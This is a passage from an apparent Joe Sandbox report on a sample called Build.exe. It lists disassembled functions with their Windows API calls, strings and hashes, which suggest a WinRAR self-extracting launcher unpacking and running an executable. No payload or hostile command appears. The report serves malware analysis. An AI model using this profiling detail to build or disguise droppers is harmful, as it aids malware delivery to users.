MoveFileExW.KERNEL32(?,00000000,00000004), ref: 0093EC7F
_wcslen.LIBCMT ref: 0093ECFA
_wcslen.LIBCMT ref: 0093ED03
SetWindowTextW.USER32(?,?), ref: 0093ED62

Strings

ProgramFilesDir, xrefs: 0093EE36
<br>, xrefs: 0093ECC4
%s.%d.tmp, xrefs: 0093EC36
Software\Microsoft\Windows\CurrentVersion, xrefs: 0093EE0B

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: File$_wcslen$Attributes$Move$CurrentDeleteDirectoryEnvironmentExpandStringsTextWindow_swprintf
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 2983673336-312220925
Opcode ID: 9e8ed952f3dbcae0042fa132c9f8f2776d2f5e14476bfe2891eeb519520997b2
Instruction ID: e10b2c6cb1bffec6e89fa91e17ab61e25330702ac2cbfe36c0567d21178abb9e
Opcode Fuzzy Hash: 9e8ed952f3dbcae0042fa132c9f8f2776d2f5e14476bfe2891eeb519520997b2
Instruction Fuzzy Hash: 88F16C72904249AADB31EFA0DC95EEF33BCAF49314F14052AF90AD7190EB749A458B61

Function 0094037C Relevance: 40.5, APIs: 17, Strings: 6, Instructions: 208
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0093290A: GetModuleHandleW.KERNEL32 ref: 00932937
Part of subcall function 0093290A: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00932949
Part of subcall function 0093290A: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00932973

Part of subcall function 0093C5DD: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0093C5E5

Part of subcall function 0093CCD9: OleInitialize.OLE32(00000000), ref: 0093CCF2
Part of subcall function 0093CCD9: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0093CD29
Part of subcall function 0093CCD9: SHGetMalloc.SHELL32(0096C460), ref: 0093CD33

GetCommandLineW.KERNEL32 ref: 009403C9
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 009403F3
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007402), ref: 00940404
UnmapViewOfFile.KERNEL32(00000000), ref: 00940455

Part of subcall function 0093FFDD: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0093FFFE
Part of subcall function 0093FFDD: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00940038

Part of subcall function 00931421: _wcslen.LIBCMT ref: 00931445

CloseHandle.KERNEL32(00000000), ref: 0094045C
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe,00000800), ref: 00940476
SetEnvironmentVariableW.KERNEL32(sfxname,C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe), ref: 00940482
GetLocalTime.KERNEL32(?), ref: 0094048D
_swprintf.LIBCMT ref: 009404E1
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 009404F6
GetModuleHandleW.KERNEL32(00000000), ref: 009404FD
LoadIconW.USER32(00000000,00000064), ref: 00940514
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001DAE0,00000000), ref: 00940565
Sleep.KERNEL32(?), ref: 00940593
DeleteObject.GDI32 ref: 009405CC
DeleteObject.GDI32(?), ref: 009405DC
CloseHandle.KERNEL32 ref: 0094061F

Strings

C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe, xrefs: 0094046F, 00940474, 0094047C, 00940524
winrarsfxmappingfile.tmp, xrefs: 009403E7
sfxstime, xrefs: 009404F1
sfxname, xrefs: 0094047D
STARTDLG, xrefs: 0094055A
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 009404D2

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf_wcslen
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 3014515783-1210057712
Opcode ID: 0afc79d44b21e264dc7ee76163506f1badb05e12ef43b9af523f30dc998bd2ef
Instruction ID: 393919609470302c3806acde2dce6247fced190635a19f69ed24ea1becadef2d
Opcode Fuzzy Hash: 0afc79d44b21e264dc7ee76163506f1badb05e12ef43b9af523f30dc998bd2ef
Instruction Fuzzy Hash: 19711571518340ABD320AB72EC49F7B7BACEBC5745F008419FA85A32A1DF758944EF62

Function 0093C652 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,0093DA3D,00000066), ref: 0093C665
SizeofResource.KERNEL32(00000000,?,?,?,0093DA3D,00000066), ref: 0093C67C
LoadResource.KERNEL32(00000000,?,?,?,0093DA3D,00000066), ref: 0093C693
LockResource.KERNEL32(00000000,?,?,?,0093DA3D,00000066), ref: 0093C6A2
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0093DA3D,00000066), ref: 0093C6BD
GlobalLock.KERNEL32(00000000,?,?,?,?,?,0093DA3D,00000066), ref: 0093C6CE
GlobalUnlock.KERNEL32(00000000), ref: 0093C756

Part of subcall function 0093C5B6: GdipAlloc.GDIPLUS(00000010), ref: 0093C5BC

GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0093C737
GlobalFree.KERNEL32(00000000), ref: 0093C75D

Strings

PNG, xrefs: 0093C656

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
String ID: PNG
API String ID: 541704414-364855578
Opcode ID: 005814d33ed62443dafe24c8a11a2d991e5447e961ab4e416f3655b6b200d243
Instruction ID: d9daeefcb2b183996b2d2a695880a6e8ca4abb88ff7b04ea68df70256cfc62c7
Opcode Fuzzy Hash: 005814d33ed62443dafe24c8a11a2d991e5447e961ab4e416f3655b6b200d243
Instruction Fuzzy Hash: 76314EB1618B02ABD7109F62ED88D2B7BACEF85752B050519F906E3261EB31D8149FA0

Function 0092F963 Relevance: 16.4, APIs: 3, Strings: 6, Instructions: 684COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000800,1C667296), ref: 0092F9CD

Part of subcall function 0092E208: _wcslen.LIBCMT ref: 0092E210

Part of subcall function 00932663: _wcslen.LIBCMT ref: 00932669

Part of subcall function 00933D10: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,1C667296,?,?,1C667296,00000001,0092DA04,00000000,1C667296,?,00010458,?,?), ref: 00933D2C

_wcslen.LIBCMT ref: 0092FD00
__fprintf_l.LIBCMT ref: 0092FE50

Strings

*messages***, xrefs: 0092FAD1
,, xrefs: 0092FE8B
@%s:, xrefs: 0092FE3A, 0092FE46
$%s:, xrefs: 0092FE33
RTL, xrefs: 0092FE12
*messages***, xrefs: 0092FB0A

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: _wcslen$ByteCharFileModuleMultiNameWide__fprintf_l
String ID: ,$$%s:$*messages***$*messages***$@%s:$RTL
API String ID: 2646189078-285229759
Opcode ID: 251f4cd8dafb26838d5d4fea2eaef7f8cb85d867ff9feb33b8f621a1052ec6ef
Instruction ID: 4bc4e58674e94c3e5965d8b38d34f30fae9e299e508b1406954f7d3fb3209a55
Opcode Fuzzy Hash: 251f4cd8dafb26838d5d4fea2eaef7f8cb85d867ff9feb33b8f621a1052ec6ef
Instruction Fuzzy Hash: 124206719002299BDF24EFA4E861BFE73B8FF58700F50053AEA05AB285E7719945CB54

Function 0092C4A8 Relevance: 7.6, APIs: 5, Instructions: 111
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,00000000,?,?,?,0092C39F,000000FF,?,?,?,?,009287BC,?,?,00000000), ref: 0092C4E6

Part of subcall function 0092DA1E: _wcslen.LIBCMT ref: 0092DA59

FindFirstFileW.KERNELBASE(?,00000000,?,?,00000800,?,?,0092C39F,000000FF,?,?,?,?,009287BC,?,?), ref: 0092C516
GetLastError.KERNEL32(?,?,00000800,?,?,0092C39F,000000FF,?,?,?,?,009287BC,?,?,00000000,0000003A), ref: 0092C522
FindNextFileW.KERNEL32(?,?,00000000,?,?,?,0092C39F,000000FF,?,?,?,?,009287BC,?,?,00000000), ref: 0092C549
GetLastError.KERNEL32(?,?,0092C39F,000000FF,?,?,?,?,009287BC,?,?,00000000,0000003A,?,0000003A,00000802), ref: 0092C555

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next_wcslen
String ID:
API String ID: 42610566-0
Opcode ID: 1077901b596fc6334b9ac7733b328da3b15f496f64b88585db74bb6c9b2dc675
Instruction ID: aea167857d3edea004f72e88cc1988fee88c7fdb702d8f12dbe5a5def37a69ad
Opcode Fuzzy Hash: 1077901b596fc6334b9ac7733b328da3b15f496f64b88585db74bb6c9b2dc675
Instruction Fuzzy Hash: 854180B150C751ABC324EF24D880AEEF7ECBB88350F400A1EF5AAD3240D734E9448BA1

Function 0094A640 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,0094A616,?,0095F7B0,0000000C,0094A76D,?,00000002,00000000), ref: 0094A661
TerminateProcess.KERNEL32(00000000,?,0094A616,?,0095F7B0,0000000C,0094A76D,?,00000002,00000000), ref: 0094A668
ExitProcess.KERNEL32 ref: 0094A67A

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: b2c282b217c08eb3b8c20a97990cbbf51df6dcb4b636a0e849ce02f4c249522a
Instruction ID: 806c5361d4b7d46bcb55aa2e8d05706919f945cbc836cc7fd0e1ecb55788a346
Opcode Fuzzy Hash: b2c282b217c08eb3b8c20a97990cbbf51df6dcb4b636a0e849ce02f4c249522a
Instruction Fuzzy Hash: 47E08C31094208AFCF116F62CD08E4C3B7AEF80752F454010F8088B132CB36EC42DB80

Function 0093DAE0 Relevance: 97.0, APIs: 47, Strings: 8, Instructions: 750windowfilesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00921366: GetDlgItem.USER32(00000000,00003021), ref: 009213AA
Part of subcall function 00921366: SetWindowTextW.USER32(00000000,009565F4), ref: 009213C0

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0093DC06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0093DC24
IsDialogMessageW.USER32(?,?), ref: 0093DC37
TranslateMessage.USER32(?), ref: 0093DC45
DispatchMessageW.USER32(?), ref: 0093DC4F
GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0093DC72
KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0093DC95
GetDlgItem.USER32(?,00000068), ref: 0093DCB8
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0093DCD3
SendMessageW.USER32(00000000,000000C2,00000000,009565F4), ref: 0093DCE6

Part of subcall function 0093F77B: _wcslen.LIBCMT ref: 0093F7A5

SetFocus.USER32(00000000), ref: 0093DCED
_swprintf.LIBCMT ref: 0093DD4C

Part of subcall function 00924C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00924C13

GetLastError.KERNEL32(?,00000000,00000000,00000000,?,00000800), ref: 0093DDAF
GetLastError.KERNEL32(?,00000000,00000000,00000000,?,00000800), ref: 0093DDD7
GetTickCount.KERNEL32 ref: 0093DDF5
_swprintf.LIBCMT ref: 0093DE0D
GetLastError.KERNEL32(?,00000011), ref: 0093DE3F
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,00000000,00000000,00000000,?,00000800), ref: 0093DE92
_swprintf.LIBCMT ref: 0093DEC9
CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007402,winrarsfxmappingfile.tmp,?,?,?,?,00973482,00000200), ref: 0093DF1D
GetCommandLineW.KERNEL32(?,?,?,?,00973482,00000200), ref: 0093DF33
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,00973482,00000400,00000001,00000001,?,?,?,?,00973482,00000200), ref: 0093DF8A
ShellExecuteExW.SHELL32(?), ref: 0093DFB2
Sleep.KERNEL32(00000064,?,?,?,?,00973482,00000200), ref: 0093DFFA
UnmapViewOfFile.KERNEL32(?,?,0000421C,00973482,00000400,?,?,?,?,00973482,00000200), ref: 0093E023
CloseHandle.KERNEL32(?,?,?,?,?,00973482,00000200), ref: 0093E02C
_swprintf.LIBCMT ref: 0093E05F
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0093E0BE
SetDlgItemTextW.USER32(?,00000065,009565F4), ref: 0093E0D5
GetDlgItem.USER32(?,00000065), ref: 0093E0DE
GetWindowLongW.USER32(00000000,000000F0), ref: 0093E0ED
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0093E0FC
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0093E1A9
_wcslen.LIBCMT ref: 0093E1FF
_swprintf.LIBCMT ref: 0093E229
SendMessageW.USER32(?,00000080,00000001,0004045F), ref: 0093E273
SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0093E28D
GetDlgItem.USER32(?,00000068), ref: 0093E296
SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0093E2AC
GetDlgItem.USER32(?,00000066), ref: 0093E2C6
SetWindowTextW.USER32(00000000,0097589A), ref: 0093E2E8
SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0093E348
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0093E35B
DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001D8C0,00000000,?), ref: 0093E3FE
EnableWindow.USER32(00000000,00000000), ref: 0093E4CC
SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0093E50E
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0093E532

Strings

C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe, xrefs: 0093E11E, 0093E2FE
winrarsfxmappingfile.tmp, xrefs: 0093DEF3
-el -s2 "-d%s" "-sp%s", xrefs: 0093DEB8
__tmp_rar_sfx_access_check_%u, xrefs: 0093DDFC
LICENSEDLG, xrefs: 0093E3F3
%s, xrefs: 0093E219
"%s"%s, xrefs: 0093E04E
STARTDLG, xrefs: 0093DB2D

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: Item$MessageText$Send$Window_swprintf$File$ErrorLast$DialogLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellSleepTickTranslateUnmapUser__vswprintf_c_l
String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 3247240745-454947156
Opcode ID: fd114fb797008008059b842be9cc199e3515a5c9623948a6b81276c0f542e120
Instruction ID: 262e69ee942a6c3ac152dedf6d5c4cbe621b4589cf324d2f362b2e76bd6f216f
Opcode Fuzzy Hash: fd114fb797008008059b842be9cc199e3515a5c9623948a6b81276c0f542e120
Instruction Fuzzy Hash: A242F8B1958344BAEB21AFB0EC4AFFE7BACAB41B04F104015F945B61E1CBB44A44DF61

Function 0093290A Relevance: 54.6, APIs: 23, Strings: 8, Instructions: 327
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 00932937
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00932949
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00932973
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00932C1D
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00932C37
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00932C4B
ReadFile.KERNEL32(00000000,?,00007FFE,00956F24,00000000), ref: 00932C69
CloseHandle.KERNEL32(00000000), ref: 00932CCD
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00932CE6
CompareStringW.KERNEL32(00000400,00001001,00956F70,?,DXGIDebug.dll,?,00956F24,?,00000000,?,00000800), ref: 00932D3A
GetFileAttributesW.KERNELBASE(?,?,00956F24,00000800,?,00000000,?,00000800), ref: 00932D64
GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 00932DA0

Part of subcall function 009328AB: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 009328D4
Part of subcall function 009328AB: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00931309,Crypt32.dll,00000000,00931383,00000200,?,00931366,00000000,00000000,?), ref: 009328F4

_swprintf.LIBCMT ref: 00932E12
_swprintf.LIBCMT ref: 00932E5E
AllocConsole.KERNEL32 ref: 00932E66
GetCurrentProcessId.KERNEL32 ref: 00932E70
AttachConsole.KERNEL32(00000000), ref: 00932E77
_wcslen.LIBCMT ref: 00932E8C
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00932E9D
WriteConsoleW.KERNEL32(00000000), ref: 00932EA4
Sleep.KERNEL32(00002710), ref: 00932EAF
FreeConsole.KERNEL32 ref: 00932EB5
ExitProcess.KERNEL32 ref: 00932EBD

Strings

<, xrefs: 00932D3A
SetDllDirectoryW, xrefs: 00932943
kernel32, xrefs: 0093292D
SetDefaultDllDirectories, xrefs: 0093296D
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00932E4C
uxtheme.dll, xrefs: 00932DDF
DXGIDebug.dll, xrefs: 009329AE, 00932D26
dwmapi.dll, xrefs: 009329D9, 00932DD5

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite_wcslen
String ID: <$DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 270162209-1156125387
Opcode ID: 697b4a64c9f31c71d113b7eec4fd46e4c75774eae8f19506c021303afaef50d3
Instruction ID: 6fcdb663bc953f7cc14ae458b4a6d6728ebc3d086cf8a33b611b46726191c555
Opcode Fuzzy Hash: 697b4a64c9f31c71d113b7eec4fd46e4c75774eae8f19506c021303afaef50d3
Instruction Fuzzy Hash: 7DD143B100C3849BD730DFA2E849B9FBBECAB85706F50091DF99997190D7B0864C8F62

Function 0093F7FC Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 103
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0093D864: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0093D875
Part of subcall function 0093D864: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0093D886
Part of subcall function 0093D864: IsDialogMessageW.USER32(00010458,?), ref: 0093D89A
Part of subcall function 0093D864: TranslateMessage.USER32(?), ref: 0093D8A8
Part of subcall function 0093D864: DispatchMessageW.USER32(?), ref: 0093D8B2

GetDlgItem.USER32(00000068,00983CF0), ref: 0093F81F
ShowWindow.USER32(00000000,00000005,?,?,0093D099,00000001,?,?,0093DAB9,009582F0,00983CF0,00983CF0,00001000,009650C4,00000000,?), ref: 0093F844
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0093F853
SendMessageW.USER32(00000000,000000C2,00000000,009565F4), ref: 0093F861
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0093F87B
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0093F895
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0093F8D9
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0093F8E4
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0093F8F7
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0093F91E
SendMessageW.USER32(00000000,000000C2,00000000,0095769C), ref: 0093F92D

Strings

\, xrefs: 0093F885

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: c7e76d0fc234e949c1d7964ed96513600a2e39f3167ff8ce20e4aeb85e91d17e
Instruction ID: 0e9ce0ccd3804b56c82309e926659cdd43038d38494fdd44f46eb8a0409dad85
Opcode Fuzzy Hash: c7e76d0fc234e949c1d7964ed96513600a2e39f3167ff8ce20e4aeb85e91d17e
Instruction Fuzzy Hash: C93104B165D3006FE310DF64DC5AF7BBBACFB45B04F10091DF5A19A2A0C7A099048B76

Function 0093FAFC Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 0093FB35
ShellExecuteExW.SHELL32(?), ref: 0093FC78
ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 0093FCB0
GetExitCodeProcess.KERNEL32(?,?), ref: 0093FCEC
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 0093FD12
ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 0093FD78

Strings

.exe, xrefs: 0093FD1C
